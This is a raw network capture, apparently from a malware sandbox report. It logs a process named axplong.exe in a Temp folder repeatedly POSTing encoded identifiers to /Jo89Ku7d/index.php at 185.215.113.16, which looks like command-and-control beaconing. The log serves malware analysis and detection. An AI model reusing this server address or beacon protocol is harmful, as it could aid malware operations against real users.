                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.2.652364185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:51.256515980 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:51.982882023 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:51.983774900 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:52.219329119 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:52 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.2.652365185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:52.331569910 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:53.042387009 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:52 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:53.043203115 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:53.270215034 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:53 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.2.652366185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:53.378290892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:54.093739033 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:53 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:54.094599962 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:54.327029943 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        45192.168.2.652367185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:54.488035917 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:55.171766996 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:55 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:55.172557116 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:55.395965099 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:55 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        46192.168.2.652368185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:55.503397942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:56.213516951 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:56.214476109 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:56.442953110 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        47192.168.2.652369185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:56.552180052 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:57.260196924 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:57.349971056 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:57.578777075 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        48192.168.2.652370185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:57.691884995 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:58.420772076 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:58 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:58.421725035 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:58.660734892 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:58 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        49192.168.2.652371185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:58.769398928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:59.486648083 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:59.487883091 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:59.717890978 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        50192.168.2.652372185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:59.879235983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:00.584180117 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:00.585761070 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:00.816585064 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        51192.168.2.652373185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:00.928431988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:01.627623081 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:01.628426075 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:01.860166073 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        52192.168.2.652374185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:01.971878052 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:02.685197115 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:02.750123024 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:02.984669924 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:02 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        53192.168.2.652375185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:43:03.113107920 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:43:03.908499002 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:03 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:43:03.911488056 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:43:04.136341095 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:43:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
